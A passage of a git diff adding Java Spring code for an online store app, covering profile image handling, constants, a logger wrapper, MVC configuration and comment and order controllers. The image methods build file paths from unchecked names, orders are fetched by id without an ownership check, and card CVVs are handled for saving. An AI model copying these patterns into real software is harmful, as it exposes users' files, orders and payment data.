+            logger.error(ex.getMessage(), ex);
+            throw new ServiceException(ex.getMessage());
+        }
+        user.setImage(null);
+        return userRepository.update(user);
+    }
+
+    @Transactional
+    public byte[] getImage(Long id) throws InstanceNotFoundException {
+        User user = userRepository.findById(id);
+        try {
+            return getProfileImage(id, user.getImage());
+        } catch (IOException ex) {
+            logger.error(ex.getMessage(), ex);
+            return null;
+        }
+    }
+
+    private void saveProfileImage(Long id, String image, byte[] imageContents) {
+        if (image != null && image.trim().length() > 0 && imageContents != null) {
+            File userDir = new File(resourcesDir, id.toString());
+            userDir.mkdirs();
+            File profilePicture = new File(userDir, image);
+            try (FileOutputStream outputStream = new FileOutputStream(profilePicture);) {
+                IOUtils.copy(new ByteArrayInputStream(imageContents), outputStream);
+            } catch (Exception e) {
+                logger.error(e.getMessage(), e);
+            }
+        }
+    }
+
+    private void deleteProfileImage(Long id, String image) throws IOException {
+        if (image != null && image.trim().length() > 0) {
+            File userDir = new File(resourcesDir, id.toString());
+            File profilePicture = new File(userDir, image);
+            Files.delete(profilePicture.toPath());
+        }
+    }
+
+    private byte[] getProfileImage(Long id, String image) throws IOException {
+        if (image != null && image.trim().length() > 0) {
+            File userDir = new File(resourcesDir, id.toString());
+            File profilePicture = new File(userDir, image);
+            try (FileInputStream input = new FileInputStream(profilePicture)) {
+                return IOUtils.toByteArray(input);
+            }
+        }
+        return null;
+    }
+
+}
diff --git a/src/main/java/es/storeapp/business/utils/ExceptionGenerationUtils.java b/src/main/java/es/storeapp/business/utils/ExceptionGenerationUtils.java
new file mode 100644
index 0000000..4aaffe4
--- /dev/null
+++ b/src/main/java/es/storeapp/business/utils/ExceptionGenerationUtils.java
@@ -0,0 +1,46 @@
+package es.storeapp.business.utils;
+
+import es.storeapp.business.exceptions.AuthenticationException;
+import es.storeapp.business.exceptions.DuplicatedResourceException;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.exceptions.InvalidStateException;
+import java.util.Locale;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.context.i18n.LocaleContextHolder;
+import org.springframework.stereotype.Component;
+
+@Component
+public class ExceptionGenerationUtils {
+    
+    @Autowired
+    private MessageSource messageSource;
+    
+    public InstanceNotFoundException toInstanceNotFoundException(Long id, String type, String messageKey) 
+            throws InstanceNotFoundException {
+        Locale locale = LocaleContextHolder.getLocale();
+        String message = messageSource.getMessage(messageKey, new Object[]{type, id}, locale);
+        return new InstanceNotFoundException(id, type, message);
+    }
+    
+    public DuplicatedResourceException toDuplicatedResourceException(String resource, String value, String messageKey) 
+            throws DuplicatedResourceException {
+        Locale locale = LocaleContextHolder.getLocale();
+        String message = messageSource.getMessage(messageKey, new Object[]{value, resource}, locale);
+        return new DuplicatedResourceException(resource, value, message);
+    }
+
+    public AuthenticationException toAuthenticationException(String messageKey, String user) 
+            throws AuthenticationException {
+        Locale locale = LocaleContextHolder.getLocale();
+        String message = messageSource.getMessage(messageKey, new Object[] {user}, locale);
+        return new AuthenticationException(message);
+    }
+
+    public InvalidStateException toInvalidStateException(String messageKey) throws InvalidStateException {
+        Locale locale = LocaleContextHolder.getLocale();
+        String message = messageSource.getMessage(messageKey, new Object[0], locale);
+        return new InvalidStateException(message);
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/common/ConfigurationParameters.java b/src/main/java/es/storeapp/common/ConfigurationParameters.java
new file mode 100644
index 0000000..9e23fc6
--- /dev/null
+++ b/src/main/java/es/storeapp/common/ConfigurationParameters.java
@@ -0,0 +1,84 @@
+package es.storeapp.common;
+
+import org.springframework.boot.context.properties.ConfigurationProperties;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+@ConfigurationProperties("server.cofiguration")
+public class ConfigurationParameters {
+    
+    private String resources;
+    private String mailHost;
+    private Integer mailPort;
+    private String mailUserName;
+    private String mailPassword;
+    private Boolean mailSslEnable;
+    private Boolean mailStartTlsEnable;
+    private String mailFrom;
+
+    public String getResources() {
+        return resources;
+    }
+
+    public void setResources(String resources) {
+        this.resources = resources;
+    }
+
+    public String getMailHost() {
+        return mailHost;
+    }
+
+    public void setMailHost(String mailHost) {
+        this.mailHost = mailHost;
+    }
+
+    public Integer getMailPort() {
+        return mailPort;
+    }
+
+    public void setMailPort(Integer mailPort) {
+        this.mailPort = mailPort;
+    }
+
+    public String getMailUserName() {
+        return mailUserName;
+    }
+
+    public void setMailUserName(String mailUserName) {
+        this.mailUserName = mailUserName;
+    }
+
+    public String getMailPassword() {
+        return mailPassword;
+    }
+
+    public void setMailPassword(String mailPassword) {
+        this.mailPassword = mailPassword;
+    }
+
+    public Boolean getMailSslEnable() {
+        return mailSslEnable;
+    }
+
+    public void setMailSslEnable(Boolean mailSslEnable) {
+        this.mailSslEnable = mailSslEnable;
+    }
+
+    public String getMailFrom() {
+        return mailFrom;
+    }
+
+    public void setMailFrom(String mailFrom) {
+        this.mailFrom = mailFrom;
+    }
+
+    public Boolean getMailStartTlsEnable() {
+        return mailStartTlsEnable;
+    }
+
+    public void setMailStartTlsEnable(Boolean mailStartTlsEnable) {
+        this.mailStartTlsEnable = mailStartTlsEnable;
+    }
+
+    
+}
diff --git a/src/main/java/es/storeapp/common/Constants.java b/src/main/java/es/storeapp/common/Constants.java
new file mode 100644
index 0000000..87d50be
--- /dev/null
+++ b/src/main/java/es/storeapp/common/Constants.java
@@ -0,0 +1,164 @@
+package es.storeapp.common;
+
+
+public class Constants {
+
+    private Constants() {
+    }
+    
+    /* Messages */
+    
+    public static final String AUTH_INVALID_USER_MESSAGE = "auth.invalid.user";
+    public static final String AUTH_INVALID_PASSWORD_MESSAGE = "auth.invalid.password";
+    public static final String AUTH_INVALID_TOKEN_MESSAGE = "auth.invalid.token";
+    public static final String REGISTRATION_INVALID_PARAMS_MESSAGE = "registration.invalid.parameters";
+    public static final String UPDATE_PROFILE_INVALID_PARAMS_MESSAGE = "update.profile.invalid.parameters";
+    public static final String CHANGE_PASSWORD_INVALID_PARAMS_MESSAGE = "change.password.invalid.parameters";
+    public static final String RESET_PASSWORD_INVALID_PARAMS_MESSAGE = "reset.password.invalid.parameters";
+    public static final String LOGIN_INVALID_PARAMS_MESSAGE = "login.invalid.parameters";
+    public static final String INSTANCE_NOT_FOUND_MESSAGE = "instance.not.found.exception";
+    public static final String DUPLICATED_INSTANCE_MESSAGE = "duplicated.instance.exception";
+    public static final String DUPLICATED_COMMENT_MESSAGE = "duplicated.comment.exception";
+    public static final String INVALID_PROFILE_IMAGE_MESSAGE = "invalid.profile.image";
+    public static final String INVALID_STATE_EXCEPTION_MESSAGE = "invalid.state";
+    public static final String INVALID_EMAIL_MESSAGE = "invalid.email";
+   
+    public static final String PRODUCT_ADDED_TO_THE_SHOPPING_CART = "product.added.to.the.cart";
+    public static final String PRODUCT_REMOVED_FROM_THE_SHOPPING_CART = "product.removed.from.the.cart";
+    public static final String PRODUCT_ALREADY_IN_SHOPPING_CART = "product.already.in.cart";
+    public static final String PRODUCT_NOT_IN_SHOPPING_CART = "product.not.in.cart";
+    public static final String EMPTY_SHOPPING_CART = "shopping.cart.empty";
+    public static final String PRODUCT_COMMENT_CREATED = "product.comment.created";
+    
+    public static final String ORDER_AUTOGENERATED_NAME = "order.name.autogenerated";
+    public static final String ORDER_SINGLE_PRODUCT_AUTOGENERATED_NAME_MESSAGE = "order.name.single.product.autogenerated";
+    public static final String CREATE_ORDER_INVALID_PARAMS_MESSAGE = "create.order.invalid.parameters";
+    public static final String PAY_ORDER_INVALID_PARAMS_MESSAGE = "pay.order.invalid.parameters";
+    public static final String CANCEL_ORDER_INVALID_PARAMS_MESSAGE = "cancel.order.invalid.parameters";
+    
+    public static final String ORDER_CREATED_MESSAGE = "order.created";
+    public static final String ORDER_PAYMENT_COMPLETE_MESSAGE = "order.payment.completed";
+    public static final String ORDER_CANCEL_COMPLETE_MESSAGE = "order.cancellation.completed";
+    
+    public static final String REGISTRATION_SUCCESS_MESSAGE = "registration.success";
+    public static final String PROFILE_UPDATE_SUCCESS = "profile.updated.success";
+    public static final String CHANGE_PASSWORD_SUCCESS = "change.password.success";
+    
+    public static final String MAIL_SUBJECT_MESSAGE = "mail.subject";
+    public static final String MAIL_TEMPLATE_MESSAGE = "mail.template";
+    public static final String MAIL_HTML_NOT_SUPPORTED_MESSAGE = "mail.html.not.supported";
+    public static final String MAIL_SUCCESS_MESSAGE = "mail.sent.success";
+    public static final String MAIL_NOT_CONFIGURED_MESSAGE = "mail.not.configured";
+    
+    /* Web Endpoints */
+    
+    public static final String ROOT_ENDPOINT = "/";
+    public static final String ALL_ENDPOINTS = "/**";
+    public static final String LOGIN_ENDPOINT = "/login";
+    public static final String LOGOUT_ENDPOINT = "/logout";
+    public static final String USER_PROFILE_ALL_ENDPOINTS = "/profile/**";
+    public static final String USER_PROFILE_ENDPOINT = "/profile";
+    public static final String USER_PROFILE_IMAGE_ENDPOINT = "/profile/image";
+    public static final String USER_PROFILE_IMAGE_REMOVE_ENDPOINT = "/profile/image/remove";
+    public static final String REGISTRATION_ENDPOINT = "/registration";
+    public static final String ORDERS_ALL_ENDPOINTS = "/orders/**";
+    public static final String ORDERS_ENDPOINT = "/orders";
+    public static final String ORDER_ENDPOINT = "/orders/{id}";
+    public static final String ORDER_ENDPOINT_TEMPLATE = "/orders/{0}";
+    public static final String ORDER_CONFIRM_ENDPOINT = "/orders/complete";
+    public static final String ORDER_PAYMENT_ENDPOINT = "/orders/{id}/pay";
+    public static final String ORDER_PAYMENT_ENDPOINT_TEMPLATE = "/orders/{0}/pay";
+    public static final String ORDER_CANCEL_ENDPOINT = "/orders/{id}/cancel";
+    public static final String PRODUCTS_ENDPOINT = "/products";
+    public static final String PRODUCT_ENDPOINT = "/products/{id}";
+    public static final String PRODUCT_TEMPLATE = "/products/{0}";
+    public static final String CHANGE_PASSWORD_ENDPOINT = "/changePassword";
+    public static final String RESET_PASSWORD_ENDPOINT = "/resetPassword";
+    public static final String SEND_EMAIL_ENDPOINT = "/sendEmail";
+    public static final String CART_ADD_PRODUCT_ENDPOINT = "/products/{id}/addToCart";
+    public static final String CART_REMOVE_PRODUCT_ENDPOINT = "/products/{id}/removeFromCart";
+    public static final String CART_ENDPOINT = "/cart";
+    public static final String COMMENT_PRODUCT_ENDPOINT = "/products/{id}/rate";
+    public static final String EXTERNAL_RESOURCES = "/resources/**";
+    public static final String LIBS_RESOURCES = "/webjars/**";
+    public static final String SEND_REDIRECT = "redirect:";
+    
+    /* Web Pages */
+    
+    public static final String LOGIN_PAGE = "Login";
+    public static final String HOME_PAGE = "Index";
+    public static final String ERROR_PAGE = "error";
+    public static final String PASSWORD_PAGE = "ChangePassword";
+    public static final String SEND_EMAIL_PAGE = "SendEmail";
+    public static final String RESET_PASSWORD_PAGE = "ResetPassword";
+    public static final String USER_PROFILE_PAGE = "Profile";
+    public static final String PRODUCTS_PAGE = "Products";
+    public static final String PRODUCT_PAGE = "Product";
+    public static final String SHOPPING_CART_PAGE = "Cart";
+    public static final String ORDER_COMPLETE_PAGE = "OrderConfirm";
+    public static final String ORDER_PAGE = "Order";
+    public static final String ORDER_PAYMENT_PAGE = "Payment";
+    public static final String ORDERS_PAGE = "Orders";
+    public static final String PAYMENTS_PAGE = "Orders";
+    public static final String COMMENT_PAGE = "Comment";
+    
+    /* Request/session/model Attributes */
+    
+    public static final String PARAMS = "?";
+    public static final String PARAM_VALUE = "=";
+    public static final String NEW_PARAM_VALUE = "&";
+    public static final String USER_SESSION = "user";
+    public static final String SHOPPING_CART_SESSION = "shoppingCart";
+    public static final String ERROR_MESSAGE = "errorMessage";
+    public static final String EXCEPTION = "exception";
+    public static final String WARNING_MESSAGE = "warningMessage";
+    public static final String SUCCESS_MESSAGE = "successMessage";
+    public static final String MESSAGE = "message"; /* predefined */
+    public static final String LOGIN_FORM = "loginForm";
+    public static final String USER_PROFILE_FORM = "userProfileForm";
+    public static final String PASSWORD_FORM = "passwordForm";
+    public static final String RESET_PASSWORD_FORM = "resetPasswordForm";
+    public static final String COMMENT_FORM = "commentForm";
+    public static final String PAYMENT_FORM = "paymentForm";
+    public static final String NEXT_PAGE = "next";
+    public static final String CATEGORIES = "categories";
+    public static final String PRODUCTS = "products";
+    public static final String PRODUCTS_ARRAY = "products[]";
+    public static final String PRODUCT = "product";
+    public static final String ORDER_FORM = "orderForm";
+    public static final String ORDERS = "orders";
+    public static final String ORDER = "order";
+    public static final String PAY_NOW = "pay";
+    public static final String BUY_BY_USER = "buyByUser";
+    public static final String EMAIL_PARAM = "email";
+    public static final String TOKEN_PARAM = "token";
+    
+    /* Entities, attributes and tables */
+    
+    public static final String USER_ENTITY = "User";
+    public static final String PRODUCT_ENTITY = "Product";
+    public static final String CATEGORY_ENTITY = "Category";
+    public static final String COMMENT_ENTITY = "Comment";
+    public static final String ORDER_ENTITY = "Order";
+    public static final String ORDER_LINE_ENTITY = "OrderLine";
+    
+    public static final String USERS_TABLE = "Users";
+    public static final String PRODUCTS_TABLE = "Products";
+    public static final String CATEGORIES_TABLE = "Categories";
+    public static final String COMMENTS_TABLE = "Comments";
+    public static final String ORDERS_TABLE = "Orders";
+    public static final String ORDER_LINES_TABLE = "OrderLines";
+    
+    public static final String PRICE_FIELD = "price";
+    public static final String NAME_FIELD = "name";
+    public static final String EMAIL_FIELD = "email";
+    
+    /* Other */
+    
+    public static final String CONTENT_TYPE_HEADER = "Content-Type";
+    public static final String CONTENT_DISPOSITION_HEADER = "Content-Disposition";
+    public static final String CONTENT_DISPOSITION_HEADER_VALUE = "attachment; filename={0}-{1}";
+    public static final String PERSISTENT_USER_COOKIE = "user-info";
+    public static final String URL_FORMAT = "{0}://{1}:{2}{3}{4}";
+    
+}
diff --git a/src/main/java/es/storeapp/common/EscapingLoggerWrapper.java b/src/main/java/es/storeapp/common/EscapingLoggerWrapper.java
new file mode 100644
index 0000000..4d05dc0
--- /dev/null
+++ b/src/main/java/es/storeapp/common/EscapingLoggerWrapper.java
@@ -0,0 +1,54 @@
+package es.storeapp.common;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.owasp.encoder.Encode;
+
+public class EscapingLoggerWrapper {
+    private final Logger wrappedLogger;
+
+    public EscapingLoggerWrapper(Class<?> clazz) {
+        this.wrappedLogger = LoggerFactory.getLogger(clazz);
+    }
+
+    // Implementa todos los métodos de la interfaz org.slf4j.Logger
+    // y agrega la lógica de escape de caracteres antes de llamar a los métodos del logger subyacente
+
+    public void info(String format, Object... arguments) {
+        String escapedFormat = escapeCharacters(format);
+        wrappedLogger.info(escapedFormat, arguments);
+    }
+
+    public void error(String format, Object... arguments) {
+        String escapedFormat = escapeCharacters(format);
+        wrappedLogger.error(escapedFormat, arguments);
+    }
+
+    public void debug(String format, Object... arguments) {
+        String escapedFormat = escapeCharacters(format);
+        wrappedLogger.debug(escapedFormat, arguments);
+    }
+
+    public void warn(String format, Object... arguments) {
+        String escapedFormat = escapeCharacters(format);
+        wrappedLogger.warn(escapedFormat, arguments);
+    }
+
+    public boolean isWarnEnabled(){
+        return wrappedLogger.isWarnEnabled();
+    }
+
+    public boolean isDebugEnabled(){
+        return wrappedLogger.isDebugEnabled();
+    }
+
+    public boolean isErrorEnabled(){
+        return wrappedLogger.isErrorEnabled();
+    }
+
+    // Método de escape de caracteres
+    private String escapeCharacters(String input) {
+        String string = Encode.forHtml(input);//evita javascript inyection
+        return Encode.forJava(string);//codifica los saltos de linea
+    }
+}
diff --git a/src/main/java/es/storeapp/web/config/WebMvcConfig.java b/src/main/java/es/storeapp/web/config/WebMvcConfig.java
new file mode 100644
index 0000000..a47db0f
--- /dev/null
+++ b/src/main/java/es/storeapp/web/config/WebMvcConfig.java
@@ -0,0 +1,65 @@
+package es.storeapp.web.config;
+
+import es.storeapp.business.services.UserService;
+import es.storeapp.common.ConfigurationParameters;
+import es.storeapp.common.Constants;
+import es.storeapp.web.interceptors.AuthenticatedUserInterceptor;
+import es.storeapp.web.interceptors.AutoLoginInterceptor;
+import es.storeapp.web.interceptors.CSPInterceptor;
+import es.storeapp.web.interceptors.LoggerInterceptor;
+import es.storeapp.web.interceptors.ShoppingCartInterceptor;
+import java.io.File;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
+import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
+import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
+
+@Configuration
+public class WebMvcConfig implements WebMvcConfigurer {
+
+    @Autowired
+    ConfigurationParameters configurationParameters;
+    
+    @Autowired
+    private UserService userService;
+    
+    @Override
+    public void addInterceptors(InterceptorRegistry registry) {
+        
+        /* AutoLogin detecting the persistent cookie */
+        registry.addInterceptor(new AutoLoginInterceptor(userService))
+                .addPathPatterns(Constants.ALL_ENDPOINTS)
+                .excludePathPatterns(Constants.LIBS_RESOURCES)
+                .excludePathPatterns(Constants.EXTERNAL_RESOURCES);
+        
+        /* CSP interceptor */
+        registry.addInterceptor(new CSPInterceptor())
+                .addPathPatterns(Constants.ALL_ENDPOINTS)
+                .excludePathPatterns(Constants.LIBS_RESOURCES)
+                .excludePathPatterns(Constants.EXTERNAL_RESOURCES);
+        
+        /* Request log interceptor */
+        registry.addInterceptor(new LoggerInterceptor());
+        
+        /* Shopping cart guard */
+        registry.addInterceptor(new ShoppingCartInterceptor())
+                .addPathPatterns(Constants.ALL_ENDPOINTS)
+                .excludePathPatterns(Constants.LIBS_RESOURCES)
+                .excludePathPatterns(Constants.EXTERNAL_RESOURCES);
+        
+        /* Interceptor to protect authenticated resources */
+        registry.addInterceptor(new AuthenticatedUserInterceptor())
+            .addPathPatterns(Constants.ORDERS_ALL_ENDPOINTS)
+            .addPathPatterns(Constants.USER_PROFILE_ALL_ENDPOINTS)
+            .addPathPatterns(Constants.CHANGE_PASSWORD_ENDPOINT)
+            .addPathPatterns(Constants.COMMENT_PRODUCT_ENDPOINT);
+    }
+    
+    @Override
+    public void addResourceHandlers(ResourceHandlerRegistry registry) {
+        registry.addResourceHandler(Constants.EXTERNAL_RESOURCES)
+                .addResourceLocations(new File(configurationParameters.getResources()).toURI().toString());
+    }
+
+}
diff --git a/src/main/java/es/storeapp/web/controller/CommentController.java b/src/main/java/es/storeapp/web/controller/CommentController.java
new file mode 100644
index 0000000..2b2fe04
--- /dev/null
+++ b/src/main/java/es/storeapp/web/controller/CommentController.java
@@ -0,0 +1,82 @@
+package es.storeapp.web.controller;
+
+import es.storeapp.business.entities.Comment;
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.services.ProductService;
+import es.storeapp.common.Constants;
+import es.storeapp.web.exceptions.ErrorHandlingUtils;
+import es.storeapp.web.forms.CommentForm;
+import java.text.MessageFormat;
+import java.util.Locale;
+import jakarta.servlet.http.HttpSession;
+import jakarta.validation.Valid;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.ModelAttribute;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.SessionAttribute;
+import org.springframework.web.servlet.mvc.support.RedirectAttributes;
+
+@Controller
+public class CommentController {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(CommentController.class);
+
+    @Autowired
+    private ProductService productService;
+
+    @Autowired
+    private MessageSource messageSource;
+    
+    @Autowired
+    ErrorHandlingUtils errorHandlingUtils;
+    
+    @GetMapping(value = {Constants.COMMENT_PRODUCT_ENDPOINT})
+    public String doGetCommentPage(@PathVariable() Long id, 
+                                   @SessionAttribute(Constants.USER_SESSION) User user, 
+                                   Model model, 
+                                   Locale locale) {
+        CommentForm commentForm = new CommentForm();
+        commentForm.setProductId(id);
+        model.addAttribute(Constants.COMMENT_FORM, commentForm);
+        try {
+            model.addAttribute(Constants.PRODUCT, productService.findProductById(id));
+            Comment comment = productService.findCommentByUserAndProduct(user, id);
+            if(comment != null) {
+                commentForm.setRating(comment.getRating());
+                commentForm.setText(comment.getText());
+                if(logger.isDebugEnabled()) {
+                    logger.debug(MessageFormat.format("Loading previous comment {0}", commentForm));
+                }
+            }
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        return Constants.COMMENT_PAGE;
+    }
+   
+    @PostMapping(Constants.COMMENT_PRODUCT_ENDPOINT)
+    public String doCreateComment(@SessionAttribute(Constants.USER_SESSION) User user,
+                                  @Valid @ModelAttribute(Constants.COMMENT_FORM) CommentForm commentForm,
+                                  HttpSession session, 
+                                  RedirectAttributes redirectAttributes,
+                                  Locale locale, 
+                                  Model model) {
+        try {
+            productService.comment(user, commentForm.getProductId(), commentForm.getText(), commentForm.getRating());
+            String message = messageSource.getMessage(Constants.PRODUCT_COMMENT_CREATED, new Object[0], locale);
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, message);
+            return Constants.SEND_REDIRECT + MessageFormat.format(Constants.PRODUCT_TEMPLATE,
+                commentForm.getProductId());
+        } catch (InstanceNotFoundException ex) {
+           return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/controller/HomeController.java b/src/main/java/es/storeapp/web/controller/HomeController.java
new file mode 100644
index 0000000..e432e0b
--- /dev/null
+++ b/src/main/java/es/storeapp/web/controller/HomeController.java
@@ -0,0 +1,32 @@
+package es.storeapp.web.controller;
+
+import es.storeapp.business.entities.Category;
+import es.storeapp.business.services.ProductService;
+import es.storeapp.common.Constants;
+import java.text.MessageFormat;
+import java.util.List;
+import jakarta.servlet.http.HttpServletResponse;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.web.bind.annotation.GetMapping;
+
+@Controller
+public class HomeController {
+    
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(HomeController.class);
+    
+    @Autowired
+    private ProductService productService;
+    
+    @GetMapping(value = {Constants.ROOT_ENDPOINT})
+    public String doGetHome(Model model, HttpServletResponse response) {
+        List<Category> categories = productService.findHighlightedCategories();
+        model.addAttribute(Constants.CATEGORIES, categories);
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("Home categories: {0}", categories));
+        }
+        return Constants.HOME_PAGE;
+    }
+}
diff --git a/src/main/java/es/storeapp/web/controller/OrderController.java b/src/main/java/es/storeapp/web/controller/OrderController.java
new file mode 100644
index 0000000..b8f3c3b
--- /dev/null
+++ b/src/main/java/es/storeapp/web/controller/OrderController.java
@@ -0,0 +1,198 @@
+package es.storeapp.web.controller;
+
+import es.storeapp.business.entities.CreditCard;
+import es.storeapp.business.entities.Order;
+import es.storeapp.business.entities.Product;
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.exceptions.InvalidStateException;
+import es.storeapp.business.services.OrderService;
+import es.storeapp.common.Constants;
+import es.storeapp.web.exceptions.ErrorHandlingUtils;
+import es.storeapp.web.forms.OrderForm;
+import es.storeapp.web.forms.PaymentForm;
+import es.storeapp.web.session.ShoppingCart;
+import java.text.MessageFormat;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.List;
+import java.util.Locale;
+import jakarta.servlet.http.HttpSession;
+import jakarta.validation.Valid;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.validation.BindingResult;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.ModelAttribute;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.SessionAttribute;
+import org.springframework.web.servlet.mvc.support.RedirectAttributes;
+
+@Controller
+public class OrderController {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(OrderController.class);
+
+    @Autowired
+    private OrderService orderService;
+
+    @Autowired
+    private MessageSource messageSource;
+
+    @Autowired
+    ErrorHandlingUtils errorHandlingUtils;
+    
+    @GetMapping(Constants.ORDERS_ENDPOINT)
+    public String doGetOrdersPage(@SessionAttribute(Constants.USER_SESSION) User user, 
+                                  Model model, Locale locale) {
+        try {
+            model.addAttribute(Constants.ORDERS, orderService.findByUserById(user.getUserId()));
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        return Constants.ORDERS_PAGE;
+    }
+
+    @GetMapping(Constants.ORDER_ENDPOINT)
+    public String doGetOrderPage(@SessionAttribute(Constants.USER_SESSION) User user, 
+                                 @PathVariable() Long id,
+                                 Model model, 
+                                 Locale locale) {
+        try {
+            model.addAttribute(Constants.ORDER, orderService.findById(id));
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        return Constants.ORDER_PAGE;
+    }
+
+    @GetMapping(Constants.ORDER_PAYMENT_ENDPOINT)
+    public String doGetPaymentPage(@SessionAttribute(Constants.USER_SESSION) User user, 
+                                   @PathVariable() Long id,
+                                   Model model, 
+                                   Locale locale) {
+        try {
+            model.addAttribute(Constants.ORDER, orderService.findById(id));
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        PaymentForm paymentForm = new PaymentForm();
+        model.addAttribute(Constants.PAYMENT_FORM, paymentForm);
+        return Constants.ORDER_PAYMENT_PAGE;
+    }
+    
+    @GetMapping(value = {Constants.ORDER_CONFIRM_ENDPOINT})
+    public String doCompleteOrder(@SessionAttribute(Constants.SHOPPING_CART_SESSION) ShoppingCart shoppingCart,
+                                  Model model, 
+                                  Locale locale) {
+        OrderForm orderForm = new OrderForm();
+        orderForm.setPrice(shoppingCart.getTotalPrice());
+        List<Product> products = new ArrayList<>(shoppingCart.getProducts());
+        if (products.size() == 1) {
+            String orderName = messageSource.getMessage(Constants.ORDER_SINGLE_PRODUCT_AUTOGENERATED_NAME_MESSAGE,
+                    new Object[]{products.get(0).getName(), 
+                        products.get(0).getCategory().getName()}, locale);
+            orderForm.setName(orderName);
+        } else if (products.size() > 1) {
+            String orderName = messageSource.getMessage(Constants.ORDER_AUTOGENERATED_NAME,
+                    new Object[]{products.get(0).getName(), 
+                        products.get(0).getCategory().getName(), products.size() - 1}, locale);
+            orderForm.setName(orderName);
+        }
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("Go to complete order page {0}", orderForm.getName()));
+        }
+        model.addAttribute(Constants.ORDER_FORM, orderForm);
+        model.addAttribute(Constants.PRODUCTS, products);
+        return Constants.ORDER_COMPLETE_PAGE;
+    }
+
+    @PostMapping(Constants.ORDERS_ENDPOINT)
+    public String doCreateOrder(@Valid @ModelAttribute(Constants.ORDER_FORM) OrderForm orderForm,
+                                BindingResult result,
+                                @RequestParam(value = Constants.PRODUCTS_ARRAY) Long[] products,
+                                @SessionAttribute(Constants.USER_SESSION) User user,
+                                @SessionAttribute(Constants.SHOPPING_CART_SESSION) ShoppingCart shoppingCart,
+                                RedirectAttributes redirectAttributes,
+                                Locale locale, Model model) {
+        if (result.hasErrors()) {
+            return errorHandlingUtils.handleInvalidFormError(result, 
+                Constants.CREATE_ORDER_INVALID_PARAMS_MESSAGE, model, locale);
+        }
+        Order order;
+        try {
+            order = orderService.create(user, orderForm.getName(), orderForm.getAddress(), orderForm.getPrice(), 
+                    Arrays.asList(products));
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        String message = messageSource.getMessage(Constants.ORDER_CREATED_MESSAGE,
+                new Object[]{orderForm.getName()}, locale);
+        redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, message);
+        shoppingCart.clear();
+        if(orderForm.getPayNow() != null && orderForm.getPayNow()) {
+            return Constants.SEND_REDIRECT + MessageFormat.format(Constants.ORDER_PAYMENT_ENDPOINT_TEMPLATE, 
+                order.getOrderId());
+        }
+        return Constants.SEND_REDIRECT + Constants.ORDERS_ENDPOINT;
+    }
+
+    @PostMapping(Constants.ORDER_PAYMENT_ENDPOINT)
+    public String doPayOrder(@Valid @ModelAttribute(Constants.ORDER_FORM) PaymentForm paymentForm,
+                             BindingResult result,
+                             @PathVariable() Long id,
+                             @SessionAttribute(Constants.USER_SESSION) User user,
+                             HttpSession session, 
+                             RedirectAttributes redirectAttributes,
+                            Locale locale, 
+                            Model model) throws InvalidStateException {
+        if (result.hasErrors()) {
+            return errorHandlingUtils.handleInvalidFormError(result, 
+                Constants.PAY_ORDER_INVALID_PARAMS_MESSAGE, model, locale);
+        }
+        Order order;
+        try {
+            if(paymentForm.getDefaultCreditCard() != null && paymentForm.getDefaultCreditCard()) {
+                CreditCard card = user.getCard();
+                order = orderService.pay(user, id, card.getCard(), card.getCvv(), card.getExpirationMonth(),
+                        card.getExpirationYear(), false);
+            } else {
+                order = orderService.pay(user, id, paymentForm.getCreditCard(), paymentForm.getCvv(),
+                        paymentForm.getExpirationMonth(), paymentForm.getExpirationYear(), paymentForm.getSave());
+                if(paymentForm.getSave() != null && paymentForm.getSave()) {
+                    session.setAttribute(Constants.USER_SESSION, user);
+                }   
